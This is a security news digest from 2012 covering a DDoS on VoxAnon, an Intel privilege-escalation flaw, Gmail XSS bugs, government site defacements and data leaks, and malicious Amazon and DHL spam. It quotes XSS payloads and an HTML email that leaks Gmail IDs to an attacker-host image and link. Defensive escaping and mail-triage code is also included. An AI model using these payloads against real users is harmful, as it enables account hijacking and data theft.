VoxAnon IRC Network suffers DDOS Attack

VoxAnon, an IRC community created as a platform to help facilitate inter-Anonymous discussion and activities, has experienced a distributed denial-of-service (DDoS) attack.

“VoxAnon will be back soon! Check this page frequently for updates!” reads a message posted on the main page of VoxAnon.org.


“#VoxAnon is down due to #DDOS Haters will hate. We won't stop doing what we do best,” reads a tweet posted on June 10 by VoxAnon IRC.




According to a report from HOTforSecurity, the DDoS attack may have been launched by other hacktivists who call VoxAnon a platform on which security companies and law enforcement look around.



64-bit OS & virtualization software running on Intel CPU vulnerable to local privilege escalation


A critical security vulnerability has been discovered in 64-bit operating systems and virtualization software running on Intel CPUs, which can lead to a local privilege escalation exploit or a guest-to-host virtual machine escape.

The problem affects 64-bit versions of Windows, Linux, FreeBSD and the Xen hypervisor. The flaw seems to only affect Intel hardware – AMD and ARM CPUs are not affected.

"A ring3 attacker may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP)," US-CERT's vulnerability report reads.

"The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation."

Metasploit penetration testing framework founder H.D. Moore characterized the bug as a "serious guest-to-host escape vulnerability," noting that while it affects the Xen platform, it doesn't affect VMware.

To this end, operating system specific details on the vulnerability have been published by Xen, FreeBSD and Microsoft. Linux vendor Red Hat has also published two updates on the problem: RHSA-2012:0720-1 and RHSA-2012:0721-1.

To close the security hole, users should apply updates from their operating system supplier.

Google patched Persistent XSS vulnerabilities in Gmail


Security researcher Nils Juenemann discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google a few months ago; Google has now patched the vulnerabilities.

According to his blog post, Juenemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view":

An incoming mail containing <img src=x onerror=prompt(1)> within the subject, when forwarded to another user, led to XSS.

The second one is a very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/mu/#cv/search/%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E/foobar

The third security issue is a very interesting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.

When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Juenemann found that he could get them through referrer leaks.

"An attacker doesn't know the ik and the message id. Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.

We have to send to our victim an HTML e-mail with that content:
<img src="https://attackershost.com/1x1.gif">
<a href="https://attackershost.com/gmailxss">Click here to have fun</a>
<script>alert(/xss/)</script>
When the user opens the email message, the GIF image will send the user ID and message ID to the attacker's server. The second URL will also leak that data if the user clicks on it. The script will then display a JavaScript alert, and that's the attacker's code running in the context of Gmail.
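The first two flaws come down to untrusted text (a mail subject, a search term from the URL fragment) reaching an HTML sink unescaped. The following is an added illustration of that pattern and its fix, not Gmail's code and not from Juenemann's post; the function names and markup are hypothetical, and the two inputs are the ones quoted above.

```javascript
// Added example: unsafe vs. escaped rendering of the two inputs quoted on this page.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the subject is concatenated into markup that is later
// assigned to element.innerHTML, so the browser parses it as HTML.
function subjectRowUnsafe(subject) {
  return '<div class="subject">' + subject + "</div>";
}

// Hardened: escape on output, so the subject can only become a text node.
function subjectRowSafe(subject) {
  return '<div class="subject">' + escapeHtml(subject) + "</div>";
}

// Non-persistent case: the search term arrives percent-encoded in the URL
// fragment (#cv/search/<term>/...) and is untrusted once decoded.
function searchTermFromFragment(fragment) {
  const m = /^#cv\/search\/([^/]*)/.exec(fragment);
  if (!m) return null;
  try {
    return decodeURIComponent(m[1]);
  } catch {
    return null; // malformed percent-escape: refuse instead of rendering it
  }
}

function searchHeaderSafe(fragment) {
  const term = searchTermFromFragment(fragment);
  return term === null ? "" : '<h2>Results for "' + escapeHtml(term) + '"</h2>';
}

// Counts start tags of a given name that an HTML parser would see.
function countTags(html, name) {
  return (html.match(new RegExp("<" + name + "\\b", "gi")) || []).length;
}

const forwardedSubject = "Fwd: <img src=x onerror=prompt(1)>";
const fragment = "#cv/search/%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E/foobar";

console.log(countTags(subjectRowUnsafe(forwardedSubject), "img")); // element created
console.log(subjectRowSafe(forwardedSubject));
console.log(searchHeaderSafe(fragment));
```

In a browser, assigning the subject to `textContent` instead of `innerHTML` gives the same result without building an HTML string at all.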

#ProjectWestWind : Team GhostShell hacked Italian Government Sites

A hacker known as Echelon, leader of Team GhostShell, launched a new campaign called ProjectWestWind, an operation aimed at “extreme-right nationalism and racism” in politics.


“As some of you may know (although not nearly as many as it should be), Europe has these past few years been hit by waves of extreme-right nationalism and racism in its political sphere. This includes nationalist political parties like Hungary's ‘Jobbik’, Italy's ‘Lega Nord’ and Finland’s ‘True Finns’,” Echelon said.

“The parties thrive on ignorance and disappointment, and have risen towards power on the wave that was the 2008 economic crisis - just as the NSDAP did during the 30s.”

The first victims of ProjectWestWind, which targets European governments, are a number of state-owned sites from Italy.

One of the targets is the Comune di San Marzano (sanmarzano-ta.gov.it), the site of which has been defaced to display the hackers’ message. Besides altering the website’s main page, Team GhostShell has also leaked more than 100 usernames and password hashes, including the ones of the administrator.

Another target is IV Circolo C.N.Cesaro (cncesaro.gov.it) from which the hackers have leaked 41 record sets comprising usernames, email addresses, names and password hashes.

primocircolovico.gov.it has been taken offline after the group gained access to its databases, publishing 22 login details and 68 entries from a table named “docent.”

Names, usernames, passwords and email addresses have also been stolen from donmilaninapoli.gov.it, istitutodenicola.gov.it, cavaprimocircolo.gov.it and itimarconi.gov.it, all of them being taken offline.

The Italian government sites haven’t been the only victims of the first phase of ProjectWestWind. The website of the Swedish Vänsterpartiet political party (vansterpartiet.eu) and the one of the Council of Bars and Law Societies of Europe (ccbe.eu) have also been breached. From each of their databases the hackers have made available a handful of login details.

Amazon spam email leads to Blackhole Exploit kit website


Fake Amazon notification emails are hitting inboxes and trying to lure recipients into following links to sites that host the Blackhole exploit kit. The emails were spotted by GFI researchers.

The mail may look legitimate. The only thing that gives it away at first glance is the fact that multiple email addresses are included in the "To:" field, and the email is personalized for the first recipient.

The links in the email lead to various legitimate but compromised WordPress domains. Their URLs contain the following section:

/wp-content/themes/twentyten/zone(dot)html

The Blackhole exploit code tries to exploit vulnerabilities in Adobe Reader, Flash and Java. If one of the vulnerable applications is installed on your system, the kit will exploit the vulnerability and infect the system.

Intruders break into University of North Florida

The University of North Florida (UNF) has started sending out email notifications to users after learning that a database containing information about people who submitted contracts to live in the UNF residence halls could have been compromised.

UNF has now secured the servers, but an investigation shows the information could have been accessed as early as spring 2011. The hacker may have compromised sensitive data, including approximately 23,000 names and Social Security numbers of people who submitted a housing contract between 1997 and spring 2011.

The institution has also made available a frequently asked questions (FAQ) page to offer further clarifications on the incident.

To help the potential victims, UNF is covering the cost of an identity protection service for a period of one year, which includes a credit report, Daily 3 Bureau Credit Monitoring, Identity Theft Resolution, ExtendCARE and $1 Million Identity Theft Insurance.

"Hello Dear" a DHL notification mail leads to malware infection



Epic fail: a mail purportedly coming from DHL informs the user that delivery processing completed successfully. The truth is that the mail is not from DHL, and its opening words give it away: the mail starts with "Hello Dear".

The spam mail:

Hello Dear,

DHL Express Tracking Notification: Mon, 11 Jun 2012 12:14:55 +0200

Custom Reference: 9057425-HRIEI2E4Q8C
Tracking Number: UT09-2041042911
Pickup Date: Mon, 11 Jun 2012 12:14:55 +0200
Service: AIR/GROUND
Pieces: 2

Mon, 11 Jun 2012 12:14:55 +0200 - Processing complete successfully
PLEASE REFER TO ATTACHED FILE FOR DETAILED INFORMATION.

Shipment status may also be obtained from our Internet site in USA under http://track.dhl-usa.com or Globally under http://www.dhl.com/track

Please do not reply to this email. This is an automated application used only for sending proactive notifications

Thanks in advance,
DHL Express International Inc.

The mail has a zip file attachment which contains malware. Sophos products detect the Windows malware as Troj/Agent-WMO. The attached filename can vary, but takes the form DHL_International_Delivery_Details-[random code].zip.

A typical email has a subject line of "DHL Express Parcel Tracking notification [random code]" or "DHL Express Tracking Notification ID [random code]" or "DHL International Notification for shipment [random code]".
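The indicators given for this DHL mail and for the fake Amazon mail earlier on the page can be turned into a simple mail-triage check. This is an added example, not code from GFI or Sophos; the message object shape, the indicator names and the sample mails are constructed, and the format of "[random code]" is an assumption.

```javascript
// Indicators taken from this page; message shape and sample mails are constructed.
const DHL_SUBJECTS = [
  /^DHL Express Parcel Tracking notification \S+/i,
  /^DHL Express Tracking Notification ID \S+/i,
  /^DHL International Notification for shipment \S+/i,
];
// The page gives "[random code]" without a format; letters, digits and hyphens are assumed.
const DHL_ATTACHMENT = /^DHL_International_Delivery_Details-[A-Za-z0-9-]+\.zip$/i;
// Path seen on the compromised WordPress sites linked from the fake Amazon mails.
const BLACKHOLE_PATH = /\/wp-content\/themes\/twentyten\/zone\.html\b/i;

function extractUrls(body) {
  return body.match(/https?:\/\/[^\s"'<>]+/gi) || [];
}

// Returns the names of every indicator the message matches.
function triage(msg) {
  const hits = [];
  if (DHL_SUBJECTS.some((re) => re.test(msg.subject))) hits.push("dhl-subject");
  if (/^\s*Hello Dear,/.test(msg.body)) hits.push("dhl-greeting");
  if (msg.attachments.some((name) => DHL_ATTACHMENT.test(name))) hits.push("dhl-zip");
  if (extractUrls(msg.body).some((u) => BLACKHOLE_PATH.test(u))) hits.push("blackhole-path");
  // Brand mail personalized for one recipient but addressed to several.
  if (/amazon/i.test(msg.from) && msg.to.length > 1) hits.push("amazon-multi-to");
  return hits;
}

const samples = [ // constructed test mails using example.test addresses
  { from: "DHL Express <notify@example.test>", to: ["alice@example.test"],
    subject: "DHL Express Tracking Notification ID 7QX2K9",
    body: "Hello Dear,\n\nPLEASE REFER TO ATTACHED FILE FOR DETAILED INFORMATION.",
    attachments: ["DHL_International_Delivery_Details-7QX2K9.zip"] },
  { from: "Amazon.com <orders@example.test>",
    to: ["alice@example.test", "bob@example.test", "carol@example.test"],
    subject: "Your order has shipped",
    body: "Hello alice, track it at http://blog.example.test/wp-content/themes/twentyten/zone.html",
    attachments: [] },
  { from: "Amazon.com <orders@example.test>", to: ["alice@example.test"],
    subject: "Your order has shipped",
    body: "Hello alice, track it at https://shop.example.test/orders/123",
    attachments: [] },
];

for (const m of samples) console.log(m.subject, "->", triage(m));
```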

Karachi News website hacked by nyro hacker and Army Of Destruction

A hacker called Nyro Hacker broke into Pakistan's premier news web portal, The Karachi News (karachinews.com.pk), and defaced the website.

At the time of writing this article, the website displays an "under construction" message on the main page.

The mirror of the defacement is available at zone-h:
http://arab-zone.net/mirror/107910/karachinews.com.pk/

7 Philippines Govt. Sites hacked to protest against anti-hacking bill


The hacker group called "PrivateX", a coalition of local hacker groups HukbalaHack, Anonymous, PrivateX and Philkers, hacked seven Philippine government websites on Independence Day as a form of protest against a new anti-cybercrime bill.

According to GMA News, the websites affected are the City Government of Mandaluyong's website (mandaluyong.gov.ph), the website of the Office of the Ombudsman (omb.gov.ph) and the Philippine Anti-Piracy Team website (papt.org.ph).

The Philippine Nuclear Research Institute website (pnri.dost.gov.ph), the National Food Authority website (nfa.gov.ph), the Senate Electoral Tribunal website (set.gov.ph), and a Department of Health website (smokefree.gov.ph) have also been breached.

Whenever users access the above-mentioned websites, they are redirected to another page that has the defacement message of PrivateX.

The hacktivists fear that in its current form, the bill could be used as “a tool of censorship” which could pose a threat to freedom of expression.

"We're not against the government's intention to combat fraudulence, related forms of it and other serious cyber crimes, but we're absolutely against its provision that has something to do with the internet's freedom of expression (sic)," the hackers said on the defacement page.

OpenVPN official site hacked by HCJ


The official website of OpenVPN has been defaced by hackers apparently led by HcJ. OpenVPN is an open source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.

The hackers didn't mention the reason for the attack, but they wrote the following message on the defacement page: "No News Is a Good News", along with a “quote of the day” that read:

"Don’t be lammer, Leave your computer and enjoy your summer ./ HcJ"

At press time, the OpenVPN.com website has been restored and is back online. The mirror of the defacement is available at Zone-H.

It’s uncertain at this time if the hackers have gained access to information stored in the website’s databases.

The official website of the State of Louisiana hacked by Zer0Pwn

The hacker known as Zer0Pwn has managed to gain unauthorized access to the official website of the State of Louisiana (Louisiana.gov).

The hacker dumped the compromised database on Pastebin. The dump includes emails, passwords, root users, and administrator credentials.

http://pastebin.com/Ubg8GnKG

He also claimed that he found an XSS vulnerability in SubjectPlus, a web application used mostly by educational websites. He posted the proof of concept on Pastebin.